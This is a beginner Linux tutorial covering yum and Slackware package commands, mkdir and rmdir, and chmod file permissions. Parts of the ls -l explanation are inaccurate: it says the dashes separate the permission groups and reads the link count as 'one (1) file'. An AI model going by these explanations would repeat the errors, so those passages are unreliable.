Yum is a package manager that was developed by Duke University to improve the installation of RPMs. Yum searches numerous repositories for packages and their dependencies so they may be installed together in an effort to alleviate dependency issues. Red Hat Enterprise Linux 5 uses Yum to fetch packages and install RPMs and well as many Red Hat derivatives like CentOS and Fedora Core.

Yum uses a configuration file at /etc/yum.conf.

There are multiple ways by which you can install a repository on the system and install/update packages :

Code:
yum search package_name
yum info package_name
yum install package_name
yum update package_name
yum remove package_name

Slackware:

Slackware, known to the Linux world as &quot;Slack&quot;, has the reputation of being, on one hand, a flexible distribution that allows you to do practically anything you want and, on the other hand, one that is for “experienced” Linux users only.

A lot of these considerations are “politically” motivated. Slackware lacks some of the “smooth” and “slick” graphic installation packages that are becoming standard fare in commercial companies’ offerings but in the end, if you’re willing to just use the command line utilities, it’s just as easily updated as any other major distribution.

Slackware’s package format

Slackware packages come in *.tgz format. This a variation of the *.tar.gz format we’ve seen before. You can go to your favorite website and download new programs for your Slackware system and with a simple:

Code:
installpkg some_program.tgz

you have your new program installed.

If that particular package doesn’t quite move you and inspire you too much, you can just remove it:

Code:
removepkg some_program.tgz

You can also add the option -warn between the installpkg/removepkg command and instead of installing the package, it will tell you what new files are going to get added to your hard disk. That’s a good option for the “I wonder if I want this” moments of your life.

Upgrading packages

You can upgrade programs to newer versions with this command:

Code:
upgradepkg a_new_version_of_something.tgz

Using other package formats

If you’re using Slackware and you can’t find a package your looking for in the *.tgz format, you can also grab on to an *.rpm and convert it.

The way to do this is:

 

Code:
rpm2tgz some_package.rpm

This takes the rpm in question and converts it to *.tgz format. Then you can use installpkg on the new file you’ve created to install it.

GUI does not necessarily = GOOD

Once again, there is a common misconception that just because something doesn’t have a wonderful graphic interface that makes you say &quot;oooh&quot; and &quot;ahhhh&quot;, it is somehow inferior. Don’t let that missing GUI fool you here. A computer running Slackware is a tremendously flexible and configurable system. So what if you have to write things on a command line? That’s what you’ve got a keyboard for, isn’t it?

Enjoy your Slack system!

Linux mkdir and rmdir commands

‘mkdir’ is the command for making directories. ‘mkdir’ may be familiar to MS-DOS users out there. As you have noticed, the people who wrote these programs tried to give them names that described what they do more or less, not as long as ‘makemeadirectoryplease’ and not too cryptic like ‘xr77b’.

Using the ‘mkdir’ command

To create the directory ‘my_friends’ that we talked about in the last lesson, you would type:

Code:
mkdir my_friends

There are no whistles or buzzers. If you’d like some sort of acknowledgment, you could type

Code:
mkdir --verbose my_friends

and it will tell you that you created the directory.

If you type ls -l You’ll see it there along with information about it.


Now you know how to use ‘mkdir’. You can even use it to create a directory called ‘my_enemies’ if you’re into that sort of thing.

The ‘rmdir’ command

‘rmdir’ is the opposite of ‘mkdir’- it gets rid of directories. It should be pointed out that in order to use it, the directory has to be empty. If you copied or moved anything to ‘my_friends’ and you typed

Code:
rmdir my_friends/

Linux would politely tell you that you can’t do that.

So, you have to use your ‘rm’ command on the files first to remove them or use ‘mv’ to get them into another directory. Then you’re free to use ‘rmdir’

Linux File Permissions – chmod

Linux has inherited ownership concept from UNIX and permissions for files. 

As we mentioned at the beginning of this course, the big advantage that Linux has is its multi-user concept- the fact that many different people can use the same computer or that one person can use the same computer to do different jobs. That’s where the system of file permissions comes in to help out in what could be a very confusing situation. We’re going to explain some basic concepts about who owns the file and who can do what with a file. We won’t get into an enormous amount of detail here. We’ll save that for the Linux system administration course. We will show you how to understand file permission symbols and how to modify certain files so that they’re more secure.

File permission symbols

If you run the command

Code:
ls -l

in your home directory, you will get a list of files that may include something like this

Code:
-rw-r--r--  1  bob  users  1892  Jul 10  18:30 linux_course_notes.txt

This basically says, interpreting this from RIGHT to LEFT that the file, linux_course_notes.txt was created at 6:30 PM on July 10 and is 1892 bytes large. It belongs to the group users (i.e, the people who use this computer). It belongs to bob in particular and it is one (1) file. Then come the file permission symbols.

Let’s look at what these symbols mean:

The dashes – separate the permissions into three types

The first part refers to the owner’s (bob’s) permissions.

The dash – before the rw means that this is a normal file that contains any type of data. A directory, for example, would have a d instead of a dash.

The rw that follows means that bob can read and write to (modify) his own file. That’s pretty logical. If you own it, you can do what you want with it.

The second part of the these symbols after the second dash, are the permissions for the group. Linux can establish different types of groups for file access. In a one home computer environment anyone who uses the computer can read this file but cannot write to (modify) it. This is a completely normal situation. You, as a user, may want to take away the rights of others to read your file. We’ll cover how to do that later.

After the two dashes (two here because there is no write permissions for the group) come the overall user permissions. Anyone who might have access to the computer from inside or outside (in the case of a network) can read this file. Once again, we can take away the possibility of people reading this file if we so choose.

Let’s take a look at some other examples. An interesting place to look at different kinds of file permissions is the /bin directory. Here we have the commands that anybody can use on the Linux system. Let’s look at the command for gzip, a file compression utility for Linux.

Code:
-rwxr-xr-x  1 root    root        53468 May  1  1999 gzip

As we see here, there are some differences.

The program name, date, bytes are all standard. Even though this is obviously different information, the idea is the same as before.

The changes are in the owner and group. Root owns the file and it is in the group &quot;root&quot;. Root is actually the only member of that group.

The file is an executable (program) so that’s why the letter x is among the symbols.

This file can be executed by everybody: the owner (root), the group (root) and all others that have access to the computer

As we mentioned, the file is a program, so there is no need for anybody other than root to “write” to the file, so there is no w permissions for it for anybody but root.

If we look at a file in /sbin which are files that only root can use or execute, the permissions would look like this:

Code:
-rwxr--r--  1 root    root        1065 Jan 14  1999 cron

‘cron’ is a program on Linux systems that allows programs to be run automatically at certain times and under certain conditions. As we can see here, only root, the owner of the file, is allowed to use this program. There are no xpermissions for the rest of the users.

We hope you enjoyed this little walk-through of file permissions in Linux. Now that we know what we’re looking for, we can talk about changing certain permissions.

chmod

chmod is a Linux command that will let you &quot;set permissions&quot; (aka, assign who can read/write/execute) on a file.

Code:
chmod permissions file
Code:
chmod permission1_permission2_permission3 file

When using chmod, you need to be aware that there are three types of Linux users that you are setting permissions for. Therefore, when setting permissions, you are assigning them for &quot;yourself&quot;, “your group” and “everyone else” in the world. These users are technically know as:

Owner
Group
World

Therefore, when setting permissions on a file, you will want to assign all three levels of permissions, and not just one user.

Think of the chmod command actually having the following syntax…

chmod owner group world FileName

Now that you understand that you are setting permissions for THREE user levels, you just have to wrap your head around what permissions you are able to set!

There are three types of permissions that Linux allows for each file.

read
write
execute

Putting it all together:

So, in laymen terms, if you wanted a file to be readable by everyone, and writable by only you, you would write the chmod command with the following structure.

COMMAND : OWNER : GROUP : WORLD : PATH

chmod read & write read read FileName

Code:
chmod 644 myDoc.txt

Wait! What are those numbers?!?

Computers like numbers, not words. Sorry. You will have to deal with it. Take a look at the following output of ls -l

Code:
-rw-r--r-- 1 gcawood iqnection 382 Dec 19 6:49 myDoc.txt

You will need to convert the word read or write or execute into the numeric equivalent (octal) based on the table below.

4 read (r)
2 write (w)
1 execute (x)

Practical Examples

chmod 400 mydoc.txt read by owner
chmod 040 mydoc.txt read by group
chmod 004 mydoc.txt read by anybody (other)
chmod 200 mydoc.txt write by owner
chmod 020 mydoc.txt write by group
chmod 002 mydoc.txt write by anybody
chmod 100 mydoc.txt execute by owner
chmod 010 mydoc.txt execute by group
chmod 001 mydoc.txt execute by anybody

Wait! I don’t get it… there aren’t enough permissions to do what I want!


Good call. You need to add up the numbers to get other types of permissions…

So, try wrapping your head around this!!

7 = 4+2+1 (read/write/execute)
6 = 4+2 (read/write)
5 = 4+1 (read/execute)
4 = 4 (read)
3 = 2+1 (write/execute)
2 = 2 (write)
1 = 1 (execute)

chmod 666 mydoc.txt read/write by anybody! (the devil loves this one!)
chmod 755 mydoc.txt rwx for owner, rx for group and rx for the world
chmod 777 mydoc.txt read, write, execute for all! (may not be the best plan in the world…)